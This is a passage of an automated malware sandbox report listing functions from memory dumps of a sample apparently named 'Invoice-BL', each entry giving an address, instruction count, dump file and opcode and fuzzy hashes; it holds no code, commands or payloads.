Function 01317EA2 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30f7085cf8a9737c177ad59fce7451b3774dd683a6009591033050160ef8eab3
Instruction ID: 424ff1e07480ed74e6edafd1e32590d9791e9fbba4b6a9e24838923eb7b641f2
Opcode Fuzzy Hash: 30f7085cf8a9737c177ad59fce7451b3774dd683a6009591033050160ef8eab3
Instruction Fuzzy Hash: 2C51B638F1021ACBCB48EFB1F56857F7B72AB886417508924E5169779CEF34AC02DB84

Function 0131E628 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b079400a6f79afe1e6ac91dc3832d6ae07a73e9dbf10ac9f922a2f68f3e00287
Instruction ID: 3c67e91aaaa9192ac2058eb8fa49283c4f855088092af0906ea262572401dab6
Opcode Fuzzy Hash: b079400a6f79afe1e6ac91dc3832d6ae07a73e9dbf10ac9f922a2f68f3e00287
Instruction Fuzzy Hash: EF511574B002058FCB09DB69D5949AEBBF6EF88314B508539E909DB359DB32AD06CB50

Function 01317EBF Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa078a0488a1d0c3a7086d3d5f8f93e23d8ad1f53821ea46385f0356e47d8ae7
Instruction ID: dadaa70be6710f6a8164ffd554fc0098c7d287d86a13317de24fa2fb73672d23
Opcode Fuzzy Hash: aa078a0488a1d0c3a7086d3d5f8f93e23d8ad1f53821ea46385f0356e47d8ae7
Instruction Fuzzy Hash: 1C51B638F1021A8BCB48EFB1F56857F7B72AB886417518924E5169779CEF34AC02DB84

Function 01310EF7 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1534732a302cdca8b77c09b083f69f439c95bdea338c7bad83084106424932c9
Instruction ID: 55053d9be24e16bf6432093daea63c40bb4df0679e8c226e139113453546da5e
Opcode Fuzzy Hash: 1534732a302cdca8b77c09b083f69f439c95bdea338c7bad83084106424932c9
Instruction Fuzzy Hash: AF51D87C500222CFCB16FF26F4589597772FB883067108B69D4168B65DDB79A8ABCF80

Function 0131E451 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 414d3d8e36fb2f838a54eef2db5af2f0e962126d6a676cd644ee29903a7b2547
Instruction ID: 8c405f65b8b7843f693c2854f77905f70c91e09b60e95d2117438016f132c575
Opcode Fuzzy Hash: 414d3d8e36fb2f838a54eef2db5af2f0e962126d6a676cd644ee29903a7b2547
Instruction Fuzzy Hash: 50412E38B1012A8BCF49EF65D56057F77B2ABCC650B504668E805A739DEF349C038BD1

Function 0131FDA2 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d559b074dbad5f4c19641faa559be2f38eab95585fd6db2bb0d844af98903ba
Instruction ID: b459d1cc2d4a2202f26adcd19b38176f5392d69cd07265a432b2a417c0627f2c
Opcode Fuzzy Hash: 1d559b074dbad5f4c19641faa559be2f38eab95585fd6db2bb0d844af98903ba
Instruction Fuzzy Hash: FB41A170B002158FCB18DF7DD5846AEBBFAAF88614F148069D90AEB35ADB70DC458B90

Function 01317EE6 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: decafea0160b8efdf4f8e48f17e884fdc74833c5b06f18163a677affaabbf64b
Instruction ID: 114178da0d5daac9e2f13641a8387a932a8acee242de670c38f102d55bb3e86c
Opcode Fuzzy Hash: decafea0160b8efdf4f8e48f17e884fdc74833c5b06f18163a677affaabbf64b
Instruction Fuzzy Hash: 8251B538F1021A8BCB48EFB1F56857F7B72AB886417518924E5169779CEF34AC029B84

Function 01317F03 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7b4ca2005e5f09fd2945541987372b00fae84d5b22fe151e306b799f6a05583
Instruction ID: 48c764ab067c53a57899d9da35718b77ce82b6da4364632db427e618645bc6a9
Opcode Fuzzy Hash: f7b4ca2005e5f09fd2945541987372b00fae84d5b22fe151e306b799f6a05583
Instruction Fuzzy Hash: 3741C638F1021ACBCB48EFB0F56857F7B72AB886417518925E5169779CEF34AC02DB84

Function 0131ECB8 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3745a93774b1eda7f65af91e0f72fc4d83a9899f36eaeabd3d3a3a48f34b6e7f
Instruction ID: 22d26cf0145b5273cc17203f90f62a5f12877cb5d0223f20aee56b5dd811ee59
Opcode Fuzzy Hash: 3745a93774b1eda7f65af91e0f72fc4d83a9899f36eaeabd3d3a3a48f34b6e7f
Instruction Fuzzy Hash: 2F418234B001168FCB0AEB6DD5506AEB6F7AF89704B548538D909EB348DF32DD468B90

Function 01311A68 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d5b472757276f9cc258aab8aea0cb4901ec7d062856241c13a755bdea8f9cc4
Instruction ID: 062dcb263eeb23edb2a6a287e6c82f0beadb89adb6f50d4d0b86f656e56a054a
Opcode Fuzzy Hash: 8d5b472757276f9cc258aab8aea0cb4901ec7d062856241c13a755bdea8f9cc4
Instruction Fuzzy Hash: 1841AEB1A1020AAFCB08DBB984446AEBBF6FF88311F24C569D509D7345EB349D418B90

Function 01317F20 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4794b4f32600389625ee73bd7d2f2c81dec53d85a6ff5fbbd0bb62446d347033
Instruction ID: c113ee34a8187ffe7fa91bacb25ba797250cd739d24c4bc21e4c58140ed0ccda
Opcode Fuzzy Hash: 4794b4f32600389625ee73bd7d2f2c81dec53d85a6ff5fbbd0bb62446d347033
Instruction Fuzzy Hash: 3941B638F1021ACBCB48EFB0F56857F7B72AB886417518925E5169779CEF34AC02DB84

Function 01317F53 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 047c6c87658972860a77690d4fc78846e9aab2d0fa490c6d1a6b868dd29226d8
Instruction ID: 22c199916c916f29da3c5e68a01d95e6136cb131287ca94cd6831e4cf23041b5
Opcode Fuzzy Hash: 047c6c87658972860a77690d4fc78846e9aab2d0fa490c6d1a6b868dd29226d8
Instruction Fuzzy Hash: 0141B738F1021ACBCB48EF70F56857F7B72AB886417518925E5129779CEF34AC02DB84

Function 013194EA Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0573a259c3c1f520e3233449ef07df694c6b938aae787681e90fc19cbfb31617
Instruction ID: 93b07dc7c2311fc3538540ea0570ec22e3dc9bc55b7f48ee328f5fae40c2e806
Opcode Fuzzy Hash: 0573a259c3c1f520e3233449ef07df694c6b938aae787681e90fc19cbfb31617
Instruction Fuzzy Hash: 7731A535B001068FCF1DEB79E4905BE77A6EBC8254B100579D509D739ADF35DD028B81

Function 01317F70 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9537445c0fec39fd0a86a2b49736dc3c2dd6f19a2cd7998de47540f6b7ba03ba
Instruction ID: 111d497d3288350e841a162c718a8d6c224174a0acec8ebe576f040e6774775e
Opcode Fuzzy Hash: 9537445c0fec39fd0a86a2b49736dc3c2dd6f19a2cd7998de47540f6b7ba03ba
Instruction Fuzzy Hash: 4D41B638F1021A8BCB48EF60F56857E7B72AB886417518925E9129779CEF34AC029B84

Function 01319608 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cc67d8769f66b995b769f0809f9500c6541cdd3a0e7455211925111743c620a
Instruction ID: 34255571a24f1fa47b3c5b0e4c08a78ccbab5fce17126012fafe8c16f96f1457
Opcode Fuzzy Hash: 6cc67d8769f66b995b769f0809f9500c6541cdd3a0e7455211925111743c620a
Instruction Fuzzy Hash: 37319671E0031ADBDB18DFB5C45069EBBB1BF88314F258619D4016B348EB70A986CBC0

Function 01313BCD Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcc0921c711fccf643310d04b0c724c28a55cc8b5860a3c9efbeba3bc787e41e
Instruction ID: 158c409541d815c94b1b6ffa96464b87be13e5b9f38fd90be4126621012cbe12
Opcode Fuzzy Hash: fcc0921c711fccf643310d04b0c724c28a55cc8b5860a3c9efbeba3bc787e41e
Instruction Fuzzy Hash: 4141D0B0D003499FDB14DF99C584ADEBFB5FF48324F108429E819AB254DB759945CB90

Function 01313BD8 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ff2c6d212ff9b533ef71c7b2b6558deeb1fd1ed16bdd71e3d07994b878957c4
Instruction ID: d91d2b6599541c433c2828198ea812fa84d9b39b6cdff145af9c0142364e4a4e
Opcode Fuzzy Hash: 4ff2c6d212ff9b533ef71c7b2b6558deeb1fd1ed16bdd71e3d07994b878957c4
Instruction Fuzzy Hash: B341EEB0D003499FDB14DFA9C484ADEBFF5FF48314F208429E819AB254DB75A949CB90

Function 01317F8D Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88db6b9a142a773b305d7d3668213dd40202e068d2d509c2f1c144b89d2472c5
Instruction ID: 37959a8be3b5fc111f96b2a4ec61f55ecc199a302bd86095436f420069238c09
Opcode Fuzzy Hash: 88db6b9a142a773b305d7d3668213dd40202e068d2d509c2f1c144b89d2472c5
Instruction Fuzzy Hash: D6319638F1021B8BCB48EF61F56857E7B72AB886417518925E9129779CEF34AC029B84

Function 0131F2C0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039fc69c53159066f1fec88fd40b41e5e591ec946855e1ffbe633a31ae9b85f9
Instruction ID: 653209e69f4a790ed02ced52865d90191def064355bffbdae6b8bcf6da0dbfa5
Opcode Fuzzy Hash: 039fc69c53159066f1fec88fd40b41e5e591ec946855e1ffbe633a31ae9b85f9
Instruction Fuzzy Hash: 3D314174F002159FCB09EFA9D590A9EBBF6AB8C314F104929D909A7349DB329D458B90

Function 013195FA Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53057eff9037c5be11785b516d2752f423a77584b10a63749f631bbcce0b94ee
Instruction ID: d55025112e7ea5f57460fabafa4a48169d63b56987e760b438fd6a4eec569e09
Opcode Fuzzy Hash: 53057eff9037c5be11785b516d2752f423a77584b10a63749f631bbcce0b94ee
Instruction Fuzzy Hash: ED318D71E0031ADFCB18DFB5C44059EBBB2FF89314F258629D405AB208EB74A886CF80

Function 01310878 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e88265ae893f58df92488676bbf9c935c7c458ab116acd2c7d82d9f8a2ff1290
Instruction ID: f55452527cc218d307294cd5be9b872ebaf053e6ca7ec06a8ccb457916b750bb
Opcode Fuzzy Hash: e88265ae893f58df92488676bbf9c935c7c458ab116acd2c7d82d9f8a2ff1290
Instruction Fuzzy Hash: 79318430704346CFEB6DAB7AE56C32E3BA6AF44609B004169F947C26ADDF34C581CB91

Function 01310888 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49328bda79365e480ef19b781ff1f50f20eeaa54fb9be88d3865ec0afb72bad9
Instruction ID: e096b2d32c91d9ccb58bb6a1eff4b0f50a045158bbfbbb30e46ee7b1cb61adb7
Opcode Fuzzy Hash: 49328bda79365e480ef19b781ff1f50f20eeaa54fb9be88d3865ec0afb72bad9
Instruction Fuzzy Hash: 36217830704206CFEF6D6B7AE56C36E7AA7AF44609B004529F947C266DDF34C581CB61

Function 01318122 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 845806399542a44f28131f0a0f66c8ef73d00f7b7ee089025956ec29318c212f
Instruction ID: 4ccf16ba6fcd7e1a3087ba3659b729505ac00a36468b42940fbe372c618f4cfe
Opcode Fuzzy Hash: 845806399542a44f28131f0a0f66c8ef73d00f7b7ee089025956ec29318c212f
Instruction Fuzzy Hash: 11311978A0020ACFCB09DFB4D5506EEBBB2EF88701F104569C415AB754DB359D46CF90

Function 01317FB4 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afd4c3b9994b5934d3349c2092f4f0be7107c43e169accf3bb73f39deddf206d
Instruction ID: c45bfaa966e21d2ace26f660fa3d6b023809b50bedadc870c4dbca241595de0c
Opcode Fuzzy Hash: afd4c3b9994b5934d3349c2092f4f0be7107c43e169accf3bb73f39deddf206d
Instruction Fuzzy Hash: CF31B838F1021B8BCF48EF60F56857E7B72EB886417518925E9125779CEF34AC029F84

Function 0131B148 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71874a42c30da1dafb13dff013b158da99ee5c17a67dc2a285ee746a288a91ff
Instruction ID: f7c3a93b1d8b2ba974e3bcfab418f38889bc2678b2bda73f7c609b82cc63048e
Opcode Fuzzy Hash: 71874a42c30da1dafb13dff013b158da99ee5c17a67dc2a285ee746a288a91ff
Instruction Fuzzy Hash: ED31FD75F112148FCB09AFA5E8996AEBFF6FB88311F114069E906E7344DF749C058B50

Function 01318130 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08fee6fe41608e36b2eee91465883b37d89f8754e1b450f8c09b5b6363a7484a
Instruction ID: 567375b2a55ee2b947458272dd863092eb4a3279bd321d905d5e90ee55facf4f
Opcode Fuzzy Hash: 08fee6fe41608e36b2eee91465883b37d89f8754e1b450f8c09b5b6363a7484a
Instruction Fuzzy Hash: 3A31F8B8E0020ADFCF08DFB5D5506AEB7B2EF88701F104569C9196B758DB35A946CF90

Function 0131B560 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 108fe260537085c5e87242f469e79c27d5a359c57e78831b777d139c3bcde1f0
Instruction ID: 55e01897e195a0293094a0cce96d20a68c9310eeb692122dd45be4ca3a4b0811
Opcode Fuzzy Hash: 108fe260537085c5e87242f469e79c27d5a359c57e78831b777d139c3bcde1f0
Instruction Fuzzy Hash: AB212875B102149FCF059BA9A8996ADBFF6EB88321F004029E90AEB244DF7098418B94

Function 01312DC7 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4565798d14896e4c6ee003cddac2cf5021eb2671ff175c0122074e6eb2961af
Instruction ID: 379b18995900fc8d33c1484faceeb26d44e353a3d16b4e140e83aa8e864b43dc
Opcode Fuzzy Hash: f4565798d14896e4c6ee003cddac2cf5021eb2671ff175c0122074e6eb2961af
Instruction Fuzzy Hash: AF31517491021E8FCB45EFA5D8505EEBBB2FF88301F108669D1056B368EB345D56CF90

Function 012BD4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4114849761.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_12bd000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bc5ea1ae7bbd055b1be311d59ab9c5541bccb34486c319d4b5b08ec2ec3d07c
Instruction ID: 7027823f9d394d1deddff87c6962f8fd74144460f1ebcd31076872642481f35b
Opcode Fuzzy Hash: 0bc5ea1ae7bbd055b1be311d59ab9c5541bccb34486c319d4b5b08ec2ec3d07c
Instruction Fuzzy Hash: 082148B1514209DFDB05DF48E8C0BA6BF65FB9436CF24C56CD90A0B256C33AD416CBA2

Function 0131B6D8 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec90a7afbfcf979fba10dd34334a7878c406dfa267add5233777748a7c3e6d91
Instruction ID: 43871572aad74fea38874ceacd0766d996d97e64db220a888dc93de3d13f9fd3
Opcode Fuzzy Hash: ec90a7afbfcf979fba10dd34334a7878c406dfa267add5233777748a7c3e6d91
Instruction Fuzzy Hash: 7C215A75E002198FCB05DFA9E9895AEBFF6FF88311F058129E905EB248DB709C418B90

Function 0131F5A0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e10948cd2264f9396eb43d88cd84e6dc0c0b769ff5662154506b9a315b001760
Instruction ID: 1cec70b421e197872ac784895b5d46085b6901cbfcc429ced6dd36f94f6e311a
Opcode Fuzzy Hash: e10948cd2264f9396eb43d88cd84e6dc0c0b769ff5662154506b9a315b001760
Instruction Fuzzy Hash: 3A217975E0051ACBCF04DF9DE8809EEF7B9FB88324F108166D918E7255D734E9568B90

Function 0131C55A Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6deb214e60c7ca62b85ec2fd707e4a01c550dd99646c6b02ad9c63990fa19798
Instruction ID: 0a32b95518a312dd53d3b7737eacfeef73c5ca86a61b10dba49cb03f74b825d4
Opcode Fuzzy Hash: 6deb214e60c7ca62b85ec2fd707e4a01c550dd99646c6b02ad9c63990fa19798
Instruction Fuzzy Hash: 74219371E507169BDB14CFA5C8415EEFBB5BFC9300F158A2AF401AB604EBB0A985CB80

Function 01312DD8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c035d8aa66d834fbb689a5d8963b472f3b887ee36746437107345902454f7b1f
Instruction ID: 32f01c7f5288e33a1ac9e22dd0ca88604b029e6c1de14b76b0e5266bb274def5
Opcode Fuzzy Hash: c035d8aa66d834fbb689a5d8963b472f3b887ee36746437107345902454f7b1f
Instruction Fuzzy Hash: 8621FF78A1021E8FCB45EFA5D850AEEBBB2FF88301F108665D1056B368EB345D56CF91

Function 0131EF10 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8eeb3b24b6bf11b29f0cc455a3a516703f07e5a0a19c05f23496f00b076b807
Instruction ID: b26aa0cc78d7f1be464b36239083032a45b3742ed70bebb176293df2d07ca42b
Opcode Fuzzy Hash: e8eeb3b24b6bf11b29f0cc455a3a516703f07e5a0a19c05f23496f00b076b807
Instruction Fuzzy Hash: 6121A8312056418FC716CB28C580899BBE1FF8532432ACAAAE899CBB55D735EC47C740

Function 01317FFD Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6206cc9de9d286386bae3c1b8c2944c5cfd5ce82a705f187eab875ebd04ec51b
Instruction ID: e780ce45fa90fc12d4f27b164da0d694961ed2eeb788986d360423743d1e9aea
Opcode Fuzzy Hash: 6206cc9de9d286386bae3c1b8c2944c5cfd5ce82a705f187eab875ebd04ec51b
Instruction Fuzzy Hash: 7321BC38F1021BCBCF48EF60F56857E7776EB88740B518915A9125B798EF34AC029B84

Function 0131F3F8 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 130cd28c36c3c7fadcf80ca4f2c6cdd0b829ae73311bebc031f13710b5742d99
Instruction ID: 0a7ccd19dc9cac1c0dfdec0c274f56b0e57a8f7dcd1c6585c23ff49c9c0beacf
Opcode Fuzzy Hash: 130cd28c36c3c7fadcf80ca4f2c6cdd0b829ae73311bebc031f13710b5742d99
Instruction Fuzzy Hash: 1A11C875F001198FCF54DFA8D9402EEB7E9EB88214B144266D909E7649EB34CD0787D1

Function 0131C568 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbad08d168f2d4f54c9fae10d2de9e4a3a3898e78085721bf7d9cc773585d6b6
Instruction ID: 2596893260a63d2a34d59b5316572446af9db780bd6753976345adaf468d5e4f
Opcode Fuzzy Hash: fbad08d168f2d4f54c9fae10d2de9e4a3a3898e78085721bf7d9cc773585d6b6
Instruction Fuzzy Hash: E3115171E1071A9BDB18CFA5C84559EFBB5BFC9300F149629F401BB244EBB0A985CB90

Function 0131E7E8 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d76c2e4bdb06b4830adede257f5eaf97f3f344f420f91696d2c8c4f5e3d7da08
Instruction ID: 0f35d6c5616028b604bae746ad0ad57e014cb80b6a0e05789f6cf933fc8680af
